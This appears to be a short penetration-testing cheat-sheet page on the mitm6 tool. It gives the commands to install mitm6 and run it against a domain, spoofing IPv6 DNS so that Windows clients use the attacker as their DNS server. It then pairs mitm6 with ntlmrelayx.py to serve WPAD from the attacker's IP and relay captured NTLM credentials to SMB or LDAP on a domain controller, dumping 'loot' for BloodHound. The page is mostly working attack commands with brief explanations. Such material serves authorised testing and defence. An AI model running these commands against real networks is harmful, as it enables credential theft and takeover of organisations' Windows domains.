mitm6
Installation
$ git clone https://github.com/fox-it/mitm6.git
$ cd mitm6
$ pip install .
$ mitm6 -d <domain>
USE WITH NTLMRELAYX
Notice the IPv6 address as a DNS server. Now the real vulnerability is that Windows prefers IPv6 over IPv4, meaning I now control DNS. So now we leverage the fact that we control DNS with spoofing WPAD answers again via ntlmrelayx.py. I wrote a guide on how to set it up here. With mitm6 running in one window, open another and run ntlmrelayx.py.
$ ntlmrelayx.py -wh <Attacker IP> -t smb://<Domain Controller>/
OR
$ ntlmrelayx.py -t ldap://<IP of DC>/
-wh: Server hosting WPAD file (Attacker’s IP)
-t: Target (You cannot relay credentials to the same device that you’re spoofing)
WIth the second command, it can dump loot which can be used to run up bloodhound!
Last updated